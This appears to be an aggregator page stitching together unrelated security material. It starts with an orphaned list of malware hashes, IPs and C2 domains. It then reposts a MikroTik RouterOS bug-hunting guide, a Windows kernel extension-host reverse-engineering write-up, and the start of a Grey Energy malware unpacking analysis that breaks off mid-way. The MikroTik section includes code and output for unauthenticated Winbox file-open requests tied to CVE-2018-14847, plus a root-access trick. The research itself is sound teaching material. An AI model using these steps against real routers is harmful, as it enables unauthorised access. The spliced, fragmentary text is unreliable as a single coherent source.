SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferye.jpg
SHA14CDE9A53A9A49D606BC89E74D47398A69E767056Hashlrdsnhrxxferyg.gif
SHA1F99319B1B321AE9F2D1F0361BC756A43D25444CEHashlrdsnhrxxferygx.gif
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1FAHashlrdsnhrxxferyxa.~
SHA177809236FDF621ABE37B32BF073B0B893E9CE67AHashlrdsnhrxxferyxb.~
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1fAHashlrdsnhrxxferyxa.~
SHA1C2F3350AC58DE900768032554C009C4A78C47CCCHashr1.log

104.129.204[.]41
IPC2

63.251.126[.]7
IPC2

195.157.15[.]100
IPC2

173.231.184[.]59
IPC2

64.95.103[.]181
IPC2

19analiticsx00220a[.]com
DomainC2

qnccmvbrh.wilstonbrwsaq[.]pw
DomainC2

Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.


Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/boot.cat
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var
albinolobster@ubuntu:~/6.42.11$

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.


Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 
/nova/bin/log,3
/nova/bin/radius,5
/nova/bin/moduler,6
/nova/bin/user,13
/nova/bin/resolver,14
/nova/bin/mactel,15
/nova/bin/undo,17
/nova/bin/macping,18
/nova/bin/cerm,19
/nova/bin/cerm-worker,75
/nova/bin/net,20
...

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.


Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(17);

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002);
msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.set_command(7);
msg.add_string(1, "list"); // the file to open

msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.

Conclusion

I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

Yes, More Callbacks — The Kernel Extension Mechanism

Original text by Yarden Shafir

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00rudocumented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallbackand search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);

typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY(unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRYstructure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know 🙂


Appendix A — Extension hosts initialized by NTOS:


Appendix B — functions pseudo-code:

NTSTATUS ExRegisterExtension(_Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PREGISTRATION_INFO RegistrationInfo)
{
	// Validate that version is ok and that FunctionTable is not sent without FunctionCount or vise-versa.
	if ( (RegistrationVersion & 0xFFFF0000 != 0x10000) || (RegistrationInfo->FunctionTable == nullptr && RegistrationInfo->FunctionCount != 0) ) 
	{ 
		return STATUS_INVALID_PARAMETER; 
	}

	// Skipping over some lock-related stuff,
	
	// Find the host with the matching version and id.
	PHOST_LIST_ENTRY pHostListEntry;
	pHostListEntry = ExpFindHost(RegistrationInfo->ExtensionId, RegistrationInfo->ExtensionVersion);

	// More lock-related stuff.	

	if (!pHostListEntry)
	{
		return STATUS_NOT_FOUND;
	}

	// Verify that the FunctionCount in the host doesn't exceed the FunctionCount supplied by the caller.
	if (RegistrationInfo->FunctionCount < pHostListEntry->FunctionCount)
	{
		ExpDereferenceHost(pHostListEntry);
		return STATUS_INVALID_PARAMETER;
	}

	// Check that the number of functions in FunctionTable matches the amount in FunctionCount.
	PVOID FunctionTable = RegistrationInfo->FunctionTable;
	for (int i = 0; i < RegistrationInfo->FunctionCount; i++)
	{	
		if ( RegistrationInfo->FunctionTable[i] == nullptr ) 
		{ 
			ExpDereferenceHost(pHostListEntry);
			return STATUS_ACCESS_DENIED; 
		}
	}

	// skipping over some more lock-related stuff

	// Check if there is already an extension registered for this host.
	if (pHostListEntry->FunctionTable != nullptr || FlagOn(pHostListEntry->Flags, 1) )
	{
		// There is something related to locks here
		ExpDereferenceHost(pHostListEntry);
		return STATUS_OBJECT_NAME_COLLISION;
	}

	// If there is a callback function for this host, call it before registering the extension, with 0 as the first parameter.
	if (pHostListEntry->FunctionAddress) 
	{ 
		pHostListEntry->FunctionAddress(0, pHostListEntry->ArgForFunction); 
	}

	// Set the FunctionTable in the host to the table supplied by the caller, or to MmBadPointer if a table wasn't supplied.
	if (RegistrationInfo->FunctionTable == nullptr)
	{
		pHostListEntry->FunctionTable = nt!MmBadPointer;
	}
	else
	{
		pHostListEntry->FunctionTable = RegistrationInfo->FunctionTable;
	}

	pHostListEntry->RundownRef = 0;

	// If there is a callback function for this host, call it after registering the extension, with 1 as the first parameter.
	if (pHostListEntry->FunctionAddress)
	{
		pHostListEntry->FunctionAddress(1, pHostListEntry->ArgForFunction);
	}

	// Here there is some more lock-related stuff

	// Set the HostTable of the calling driver to the table of functions listed in the host.
	if (RegistrationInfo->HostTable != nullptr)
	{
		*(PVOID)RegistrationInfo->HostTable = pHostListEntry->hostInterface;
	}

	// Return the initialized host to the caller in the output Extension parameter.
	*Extension = pHostListEntry;
	return STATUS_SUCCESS;
}

ExRegisterExtension.c hosted with ❤ by GitHub

NTSTATUS ExRegisterHost(_Out_ PHOST_LIST_ENTRY ExtensionHost, _In_ ULONG Unused, _In_ PHOST_INFORMATION HostInformation)
{
	NTSTATUS Status = STATUS_SUCCESS;

	// Allocate memory for a new HOST_LIST_ENTRY
	PHOST_LIST_ENTRY p = ExAllocatePoolWithTag(HostInformation->PoolType, 0x60, 'HExE');
	if (p == nullptr)
	{
		return STATUS_INSUFFICIENT_RESOURCES;
	}

	//
	// Initialize a new HOST_LIST_ENTRY 
	//
	p->Flags &= 0xFE;
	p->RefCount = 1;
	p->FunctionTable = 0;
	p->ExtensionId = HostInformation->ExtensionId;
	p->ExtensionVersion = HostInformation->ExtensionVersion;
	p->hostInterface = HostInformation->hostInterface;
	p->FunctionAddress = HostInformation->FunctionAddress;
	p->ArgForFunction = HostInformation->ArgForFunction;			
	p->Lock = 0; 			
	p->RundownRef = 0;		

	// Search for an existing listEntry with the same version and id.
	PHOST_LIST_ENTRY listEntry = ExpFindHost(HostInformation->ExtensionId, HostInformation->ExtensionVersion);
	if (listEntry)
	{
		Status = STATUS_OBJECT_NAME_COLLISION;
		ExpDereferenceHost(p);
		ExpDereferenceHost(listEntry);
	}
	else
	{
		// Insert the new HOST_LIST_ENTRY to the end of ExpHostList.
		if ( *lastHostListEntry != &firstHostListEntry )
		{
	      	    __fastfail();
		}

		firstHostListEntry->Prev = &p;
		p->Next = firstHostListEntry;
		lastHostListEntry = p;

		ExtensionHost = p;
	}
	
	return Status;
}

ExRegisterHost.c hosted with ❤ by GitHub

PHOST_LIST_ENTRY ExpFindHost(USHORT ExtensionId, USHORT ExtensionVersion)
{
	PHOST_LIST_ENTRY entry;
	for (entry == ExpHostList; ; entry = entry->Next)
	{
		if (entry == &ExpHostList) 
		{ 
			return 0; 
		}
		
		if ( *(entry->ExtensionId) == ExtensionId && *(entry->ExtensionVersion) == ExtensionVersion ) 
		{ 
			break; 
		}
	}
	InterlockedIncrement(entry->RefCount);
	return entry;
}

ExpFindHost.c hosted with ❤ by GitHub

void ExpDereferenceHost(PHOST_LIST_ENTRY Host)
{
  	if ( InterlockedExchangeAdd(Host.RefCount, 0xFFFFFFFF) == 1 )
	{
    		ExFreePoolWithTag(Host, 0);
	}
}

ExpDereferenceHost.c hosted with ❤ by GitHub


Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Unpacking Grey Energy malware (Service Application DLL)

( Original text by D3xt3r )

Recently I stumbled upon malware sample which was part of Grey Energy malware campaign targeting Ukraine energy infrastructure. I ran the hash of the file on virutotal and many of the antiviruses tagged it Grey Energy and I tried to do a little more internet research but didn’t find and analysis on it. As there was no post on this sample so I decided to write one.
In the post you will learn the following:

  1. How to debug Windows Service Application DLL
  2. Learn how to use a EBFE debugging technique
  3. Unpacking a DLL binary
  4. How to dump an unpacked in-memory executable

Identifying the Malware

Using some basic static analysis tool you can know that it’s a 64-bit Windows DLL.

Since it’s a DLL there we need to see the export table. There was only one function that was exported which is ServiceMain. This is the method is usually exported by Windows Service Application DLL. This is the function which is invoked when a request is made to the Windows Service Application.

Checking the Import section you can see the below DLL been imported. But as we see the further analysis, not all the DLL which are imported are in use.

Brief Introduction To Windows Service Application

If you know already know about Windows Services then I would advise you to skip this section. I will describe all the necessary stuff about Windows Service from malware authors perspective, but if you are interested to know more about it then you can refer to links in the reference section at the end of this post.

What is a Windows Service?

Windows Service Application is to create long-running background application which you can start automatically when the system boot/reboot and it doesn’t have any user interface. Services can be put in the various state like start, stop, paused, resume and restarted, all this is managed by Windows Service Controller(services.exe). These features make it ideal for use as malware which does all its working in the background and its also long running starts on reboot. Actual use cases of Services are like Web Server service, logging machine performance metric like CPU, RAM etc. Service executable can be a DLL program with a defined entry point.

A service may be written to run as either a stand-alone process or as a part of the Service Control Manager’s(svchost.exe) process (which creates a thread per service, and the service is allowed to create more threads). If the service runs in SC, the SC creates the thread for a service then loads its DLL, and calls the Service entry points to move the service through its states (first start, then eventually stop). Since creating a thread from the svchost.exe process(a system service) giving it system privileges which can be dangerous, but you can run the DLL in the specific security context of the user account that can be different from logged-on user.

Service Application requires the following items:

To create a Service DLL you need to satisfy specific requirement which is as follows :

  1. Main Entry point: this is required to register your service by calling StartServiceCtrlDispatcherthis will be the DLL entry point.
  2. Service Entry point: which is ServiceMain in the DLL export entry, task to this function is as following tasks:
    1. Initialize any necessary items which we deferred from the DLL Entry Point.
      Register the service control handler which will handle Service Stop, Pause, Continue, Shutdown, etc control commands.
    2. Set Service Status to SERVICE_PENDING than to SERVICE_RUNNING. Set status to SERVICE_STOPPED on any errors and on exit.
    3. Perform startup tasks. Like creating threads/events/mutex/IPCs/etc.
  3. Service Control Handler: The Service Control Handler was registered in your ServiceMain Entry point. Each service must have a handler to handle control requests from the SCM. This handler will be called in the context of the SCM and will hold the SCM until it returns from the handler. Service Handler is called on various events like start, stop, paused etc which is passed as the parameter to the handler function.

Basic Static Analysis

We start with doing static analysis on the DllEntry point this might be the first function which might get executed even before ServiceMain. Below is the disassembly of the DllEntry point.

Looking at the disassembly further there was some memory allocation and manipulating of that memory. There was another interesting function which is found was at address 0x2c0202bc, this function was called after allocation of memory which seems to be like a decryptor function, or at least preparing for so decryption. Below is the disassembly of this function.

